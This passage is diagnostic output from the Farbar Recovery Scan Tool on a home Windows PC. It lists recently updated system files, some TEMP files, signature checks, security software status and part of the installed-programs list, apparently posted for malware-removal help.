2014-09-15 11:29 - 2014-05-14 20:47 - 00094720 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00045056 _____ (Microsoft Corporation) C:\windows\system32\dimsroam.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00020480 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00014848 _____ (Microsoft Corporation) C:\windows\system32\workerdd.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00961536 _____ (Microsoft Corporation) C:\windows\SysWOW64\usercpl.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00559104 _____ (Microsoft Corporation) C:\windows\SysWOW64\objsel.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00419328 _____ (Microsoft Corporation) C:\windows\system32\schannel.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00318464 _____ (Microsoft Corporation) C:\windows\system32\msv1_0.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00208896 _____ (Microsoft Corporation) C:\windows\system32\wdigest.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00178688 _____ (Microsoft Corporation) C:\windows\SysWOW64\wdigest.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\sspicli.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00100184 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ksecdd.sys
2014-09-15 11:28 - 2014-05-14 20:47 - 00099840 _____ (Microsoft Corporation) C:\windows\SysWOW64\sspicli.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00076800 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00038400 _____ (Microsoft Corporation) C:\windows\SysWOW64\dimsroam.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00035840 _____ (Microsoft Corporation) C:\windows\system32\lsass.exe
2014-09-15 11:28 - 2014-05-14 20:47 - 00027648 _____ (Microsoft Corporation) C:\windows\system32\sspisrv.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00915968 _____ (Microsoft Corporation) C:\windows\system32\MPSSVC.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00758784 _____ (Microsoft Corporation) C:\windows\system32\FirewallAPI.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00550400 _____ (Microsoft Corporation) C:\windows\SysWOW64\FirewallAPI.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00227840 _____ (Microsoft Corporation) C:\windows\system32\WebClnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00199168 _____ (Microsoft Corporation) C:\windows\SysWOW64\WebClnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00104448 _____ (Microsoft Corporation) C:\windows\system32\davclnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00086016 _____ (Microsoft Corporation) C:\windows\SysWOW64\davclnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mpsdrv.sys
2014-09-15 11:19 - 2014-06-29 13:09 - 00020992 _____ (Microsoft Corporation) C:\windows\system32\Drivers\usb8023.sys
2014-09-15 11:12 - 2014-06-29 13:10 - 00888320 _____ (Microsoft Corporation) C:\windows\system32\autochk.exe
2014-09-15 11:12 - 2014-06-29 13:10 - 00793088 _____ (Microsoft Corporation) C:\windows\SysWOW64\autochk.exe
2014-09-15 11:12 - 2014-06-29 13:10 - 00542208 _____ (Microsoft Corporation) C:\windows\system32\untfs.dll
2014-09-15 11:12 - 2014-06-29 13:10 - 00482816 _____ (Microsoft Corporation) C:\windows\SysWOW64\untfs.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 01483776 _____ (Microsoft Corporation) C:\windows\system32\VSSVC.exe
2014-09-15 11:10 - 2014-06-29 13:10 - 01131520 _____ (Microsoft Corporation) C:\windows\system32\AppXDeploymentServer.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00708096 _____ (Microsoft Corporation) C:\windows\system32\AppXDeploymentExtensions.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00470528 _____ (Microsoft Corporation) C:\windows\system32\netprofmsvc.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00389120 _____ (Microsoft Corporation) C:\windows\system32\BCP47Langs.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00169984 _____ (Microsoft Corporation) C:\windows\system32\netplwiz.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00151552 _____ (Microsoft Corporation) C:\windows\system32\netprofm.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00012288 _____ (Microsoft Corporation) C:\windows\SysWOW64\nlmsprep.dll
2014-09-15 11:09 - 2014-06-29 13:10 - 00419840 _____ (Microsoft Corporation) C:\windows\system32\intl.cpl
2014-09-15 11:09 - 2014-06-29 13:10 - 00115712 _____ (Microsoft Corporation) C:\windows\SysWOW64\netprofm.dll
2014-09-15 11:09 - 2014-06-29 13:10 - 00018432 _____ (Microsoft Corporation) C:\windows\SysWOW64\npmproxy.dll
2014-09-15 11:09 - 2014-06-29 13:10 - 00015872 _____ (Microsoft Corporation) C:\windows\SysWOW64\nlmproxy.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00449536 _____ (Microsoft Corporation) C:\windows\SysWOW64\DevicePairing.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00427520 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdbss.sys
2014-09-15 11:08 - 2014-06-29 13:10 - 00389632 _____ (Microsoft Corporation) C:\windows\SysWOW64\intl.cpl
2014-09-15 11:08 - 2014-06-29 13:10 - 00309760 _____ (Microsoft Corporation) C:\windows\SysWOW64\BCP47Langs.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00120736 _____ (Microsoft Corporation) C:\windows\system32\AuthHost.exe
2014-09-15 11:08 - 2014-06-29 13:10 - 00093696 _____ (Microsoft Corporation) C:\windows\system32\psmsrv.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00092160 _____ (Microsoft Corporation) C:\windows\SysWOW64\biwinrt.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 01332736 _____ (Microsoft Corporation) C:\windows\system32\sysmain.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00812544 _____ (Microsoft Corporation) C:\windows\system32\Magnify.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00758784 _____ (Microsoft Corporation) C:\windows\SysWOW64\Magnify.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00560640 _____ (Microsoft Corporation) C:\windows\system32\mfmp4srcsnk.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00501760 _____ (Microsoft Corporation) C:\windows\system32\DevicePairing.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00411136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfmp4srcsnk.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00330240 _____ (Microsoft Corporation) C:\windows\system32\stobject.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00303616 _____ (Microsoft Corporation) C:\windows\SysWOW64\stobject.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00179712 _____ (Microsoft Corporation) C:\windows\system32\bisrv.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00151040 _____ (Microsoft Corporation) C:\windows\SysWOW64\netplwiz.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00122368 _____ (Microsoft Corporation) C:\windows\system32\biwinrt.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00077824 _____ (Microsoft Corporation) C:\windows\system32\taskhost.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00072192 _____ (Microsoft Corporation) C:\windows\system32\taskhostex.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\muifontsetup.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00014336 _____ (Microsoft Corporation) C:\windows\SysWOW64\muifontsetup.dll
2014-09-15 11:01 - 2014-06-29 13:07 - 00733184 _____ (Microsoft Corporation) C:\windows\system32\win32spl.dll
2014-09-15 11:00 - 2014-06-29 13:06 - 02842112 _____ (Microsoft Corporation) C:\windows\system32\WMVDECOD.DLL
2014-09-15 11:00 - 2014-06-29 13:06 - 02620928 _____ (Microsoft Corporation) C:\windows\SysWOW64\WMVDECOD.DLL
2014-09-15 10:59 - 2014-06-29 13:06 - 00124112 _____ (Microsoft Corporation) C:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-09-15 10:59 - 2014-06-29 13:06 - 00102608 _____ (Microsoft Corporation) C:\windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00222720 _____ (Microsoft Corporation) C:\windows\system32\scrobj.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00194048 _____ (Microsoft Corporation) C:\windows\system32\scrrun.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00162304 _____ (Microsoft Corporation) C:\windows\SysWOW64\scrobj.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00156160 _____ (Microsoft Corporation) C:\windows\SysWOW64\scrrun.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00146944 _____ (Microsoft Corporation) C:\windows\system32\cscript.exe
2014-09-15 10:58 - 2014-06-29 13:05 - 00143872 _____ (Microsoft Corporation) C:\windows\system32\wshom.ocx
2014-09-15 10:58 - 2014-06-29 13:05 - 00115712 _____ (Microsoft Corporation) C:\windows\SysWOW64\cscript.exe
2014-09-15 10:53 - 2014-06-29 13:05 - 00337408 _____ (Microsoft Corporation) C:\windows\system32\wintrust.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00261120 _____ (Microsoft Corporation) C:\windows\SysWOW64\wintrust.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00124416 _____ (Microsoft Corporation) C:\windows\system32\apprepapi.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00098304 _____ (Microsoft Corporation) C:\windows\system32\apprepsync.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00087040 _____ (Microsoft Corporation) C:\windows\SysWOW64\apprepapi.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00074240 _____ (Microsoft Corporation) C:\windows\SysWOW64\apprepsync.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00068096 _____ (Microsoft Corporation) C:\windows\system32\cryptsvc.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 03842560 _____ (Microsoft Corporation) C:\windows\system32\d2d1.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 03288576 _____ (Microsoft Corporation) C:\windows\SysWOW64\d2d1.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 02238976 _____ (Microsoft Corporation) C:\windows\system32\d3d10warp.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 02032640 _____ (Microsoft Corporation) C:\windows\SysWOW64\d3d10warp.dll
2014-09-15 10:48 - 2014-06-29 13:05 - 00861184 _____ (Microsoft Corporation) C:\windows\system32\Drivers\http.sys
2014-09-15 10:45 - 2014-07-09 22:42 - 00576512 _____ (Microsoft Corporation) C:\windows\system32\Drivers\afd.sys
2014-09-15 10:34 - 2014-07-09 22:42 - 00596480 _____ (Microsoft Corporation) C:\windows\system32\qedit.dll
2014-09-15 10:34 - 2014-07-09 22:42 - 00497152 _____ (Microsoft Corporation) C:\windows\SysWOW64\qedit.dll
2014-09-15 10:28 - 2014-06-29 13:00 - 02233176 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2014-09-15 10:17 - 2014-06-29 13:02 - 00805376 _____ (Microsoft Corporation) C:\windows\system32\Drivers\PEAuth.sys
2014-09-15 10:17 - 2014-06-29 13:01 - 00489576 _____ (Microsoft Corporation) C:\windows\system32\AudioEng.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00468992 _____ (Microsoft Corporation) C:\windows\system32\MFMediaEngine.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00456704 _____ (Microsoft Corporation) C:\windows\system32\wpncore.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00446792 _____ (Microsoft Corporation) C:\windows\system32\AudioSes.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00253544 _____ (Microsoft Corporation) C:\windows\system32\audiodg.exe
2014-09-15 10:17 - 2014-06-29 13:01 - 00210432 _____ (Microsoft Corporation) C:\windows\system32\iuilp.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00172544 _____ (Microsoft Corporation) C:\windows\system32\dwmredir.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00169472 _____ (Microsoft Corporation) C:\windows\system32\AudioEndpointBuilder.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00155648 _____ (Microsoft Corporation) C:\windows\SysWOW64\dmvdsitf.dll
2014-09-15 10:16 - 2014-06-29 13:02 - 01113600 _____ (Microsoft Corporation) C:\windows\SysWOW64\MSAudDecMFT.dll
2014-09-15 10:16 - 2014-06-29 13:02 - 00298456 _____ (Microsoft Corporation) C:\windows\system32\rsaenh.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00426024 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioEng.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00411136 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Networking.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00367616 _____ (Microsoft Corporation) C:\windows\system32\conhost.exe
2014-09-15 10:16 - 2014-06-29 13:01 - 00324368 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioSes.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00281088 _____ (Microsoft Corporation) C:\windows\system32\mfreadwrite.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00252928 _____ (Microsoft Corporation) C:\windows\SysWOW64\rsaenh.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00214528 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfreadwrite.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00196096 _____ (Microsoft Corporation) C:\windows\system32\dmvdsitf.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00099840 _____ (Microsoft Corporation) C:\windows\system32\wscsvc.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00041984 _____ (Microsoft Corporation) C:\windows\SysWOW64\fmifs.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 14267904 _____ (Microsoft Corporation) C:\windows\system32\wmp.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 03552768 _____ (Microsoft Corporation) C:\windows\system32\tquery.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 02107904 _____ (Microsoft Corporation) C:\windows\system32\mssrch.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 00816128 _____ (Microsoft Corporation) C:\windows\system32\SearchIndexer.exe
2014-09-15 10:15 - 2014-06-29 13:01 - 00745984 _____ (Microsoft Corporation) C:\windows\system32\mssvp.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00503080 _____ (Microsoft Corporation) C:\windows\system32\ci.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00435200 _____ (Microsoft Corporation) C:\windows\system32\mssph.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00414720 _____ (Microsoft Corporation) C:\windows\system32\GenuineCenter.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00373760 _____ (Microsoft Corporation) C:\windows\system32\SearchProtocolHost.exe
2014-09-15 10:15 - 2014-06-29 13:01 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\SearchFilterHost.exe
2014-09-15 10:15 - 2014-06-29 13:01 - 00155136 _____ (Microsoft Corporation) C:\windows\SysWOW64\XpsRasterService.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00096256 _____ (Microsoft Corporation) C:\windows\system32\mssprxy.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00083456 _____ (Microsoft Corporation) C:\windows\system32\Drivers\wanarp.sys
2014-09-15 10:15 - 2014-06-29 13:01 - 00065024 _____ (Microsoft Corporation) C:\windows\system32\msscntrs.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ndproxy.sys
2014-09-15 10:15 - 2014-06-29 13:01 - 00013824 _____ (Microsoft Corporation) C:\windows\system32\msshooks.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 11878912 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmp.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 02767360 _____ (Microsoft Corporation) C:\windows\SysWOW64\tquery.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 01593344 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssrch.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 00403968 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssph.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00804352 _____ (Microsoft Corporation) C:\windows\system32\RecoveryDrive.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00670208 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchIndexer.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00659456 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssvp.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00303848 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgmms1.sys
2014-09-15 10:14 - 2014-06-29 13:01 - 00302592 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchProtocolHost.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00231936 _____ (Microsoft Corporation) C:\windows\system32\fhengine.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00228352 _____ (Microsoft Corporation) C:\windows\system32\XpsRasterService.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00186880 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssphtb.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00171008 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchFilterHost.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00123880 _____ (Microsoft Corporation) C:\windows\SysWOW64\wscapi.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\fmifs.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00035328 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssprxy.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00010752 _____ (Microsoft Corporation) C:\windows\SysWOW64\msshooks.dll
2014-09-15 10:13 - 2014-06-29 13:02 - 01444864 _____ (Microsoft Corporation) C:\windows\system32\MSAudDecMFT.dll
2014-09-15 10:13 - 2014-06-29 13:02 - 00306952 _____ (Microsoft Corporation) C:\windows\system32\kd_02_10ec.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00595456 _____ (Microsoft Corporation) C:\windows\system32\Windows.Networking.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00361984 _____ (Microsoft Corporation) C:\windows\SysWOW64\MFMediaEngine.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00086280 _____ (Microsoft Corporation) C:\windows\system32\kdnet.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00077960 _____ (Microsoft Corporation) C:\windows\system32\kdvm.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 01374208 _____ (Microsoft Corporation) C:\windows\system32\wdc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 01245696 _____ (Microsoft Corporation) C:\windows\SysWOW64\wdc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 00566784 _____ (Microsoft Corporation) C:\windows\system32\wvc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 00462336 _____ (Microsoft Corporation) C:\windows\system32\sysmon.ocx
2014-09-15 10:05 - 2014-06-29 13:00 - 00437248 _____ (Microsoft Corporation) C:\windows\SysWOW64\wvc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 00399360 _____ (Microsoft Corporation) C:\windows\SysWOW64\sysmon.ocx
2014-09-15 10:04 - 2014-06-29 13:00 - 00199168 _____ (Microsoft Corporation) C:\windows\SysWOW64\shdocvw.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 01125888 _____ (Microsoft Corporation) C:\windows\system32\msctf.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00893952 _____ (Microsoft Corporation) C:\windows\SysWOW64\msctf.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00448512 _____ (Microsoft Corporation) C:\windows\system32\SettingSync.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00356352 _____ (Microsoft Corporation) C:\windows\SysWOW64\SettingSync.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00225280 _____ (Microsoft Corporation) C:\windows\system32\mbsmsapi.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00222208 _____ (Microsoft Corporation) C:\windows\system32\shdocvw.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00128512 _____ (Microsoft Corporation) C:\windows\system32\SettingSyncInfo.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00100864 _____ (Microsoft Corporation) C:\windows\SysWOW64\SettingSyncInfo.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00069864 _____ (Microsoft Corporation) C:\windows\system32\Drivers\pdc.sys
2014-09-15 10:02 - 2014-06-29 13:00 - 00411880 _____ (Microsoft Corporation) C:\windows\system32\Drivers\FWPKCLNT.SYS
2014-09-15 10:02 - 2014-06-29 13:00 - 00158208 _____ (Microsoft Corporation) C:\windows\SysWOW64\mbsmsapi.dll
2014-09-15 10:01 - 2014-08-08 20:59 - 00000000 ____D () C:\windows\system32\MRT
2014-09-15 09:38 - 2014-06-29 13:00 - 01845760 _____ (Microsoft Corporation) C:\windows\system32\msxml3.dll
2014-09-15 09:38 - 2014-06-29 13:00 - 01419264 _____ (Microsoft Corporation) C:\windows\SysWOW64\msxml3.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 01258496 _____ (Microsoft Corporation) C:\windows\system32\kernel32.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 01120768 _____ (Microsoft Corporation) C:\windows\system32\gpedit.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 01075200 _____ (Microsoft Corporation) C:\windows\SysWOW64\gpedit.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 00974848 _____ (Microsoft Corporation) C:\windows\SysWOW64\kernel32.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 00370688 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb.sys
2014-09-15 09:25 - 2014-05-14 20:38 - 00247808 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srvnet.sys
2014-09-15 09:25 - 2014-05-14 20:38 - 00215040 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb20.sys
2014-09-14 20:22 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\Sysprep
2014-09-14 15:30 - 2014-06-04 09:02 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\WinZip
2014-09-14 15:30 - 2014-05-19 13:36 - 00000000 __RHD () C:\Users\Jeremy and Heidi\AppData\Roaming\SecuROM
2014-09-14 15:30 - 2012-12-21 22:22 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\Thunderbird
2014-09-14 15:30 - 2012-12-18 23:28 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\Adobe
2014-09-14 08:30 - 2014-07-28 08:06 - 00000000 ____D () C:\ProgramData\AVG2014

Some content of TEMP:
====================
C:\Users\Jeremy and Heidi\AppData\Local\Temp\bdfilters.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\drm_dyndata_7370014.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\ochelper.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\ochelper.exe
C:\Users\Jeremy and Heidi\AppData\Local\Temp\pidvazc.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\SymCCIS.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\ufsuqej.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-14 03:04

==================== End Of Log ============================

Here is the "Addition" file:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-10-2014
Ran by Jeremy and Heidi at 2014-10-14 19:31:56
Running from C:\Users\Jeremy and Heidi\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Emsisoft Anti-Malware (Enabled - Up to date) {8504DEEF-CC04-1F76-2137-F1A5F4A659DA}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Up to date) {3E653F0B-EA3E-10F8-1B87-CAD78F211367}
AS: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
7-zip v9.20 (HKLM-x32\...\7-zip) (Version: v9.20 - TUGUU SL) <==== ATTENTION
Adobe Reader X (10.1.3) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.3 - Adobe Systems Incorporated)
AMD Accelerated Video Transcoding (Version: 12.5.100.20808 - Advanced Micro Devices, Inc.) Hidden
AMD APP SDK Runtime (Version: 10.0.938.2 - Advanced Micro Devices Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{79AE0BD1-A930-B07C-C96D-E11FA9BB586F}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AMD Quick Stream (HKLM\...\{E9EED4AE-682B-4501-9574-D09A21717599}_is1) (Version: 3.3.26.0 - AppEx Networks)
AMD VISION Engine Control Center (x32 Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
Apple Application Support (HKLM-x32\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4765 - AVG Technologies)
AVG 2014 (Version: 14.0.4040 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4765 - AVG Technologies) Hidden
AVS Video Converter 8 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 8.3.2.533 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.0.2.655 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.4.93 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
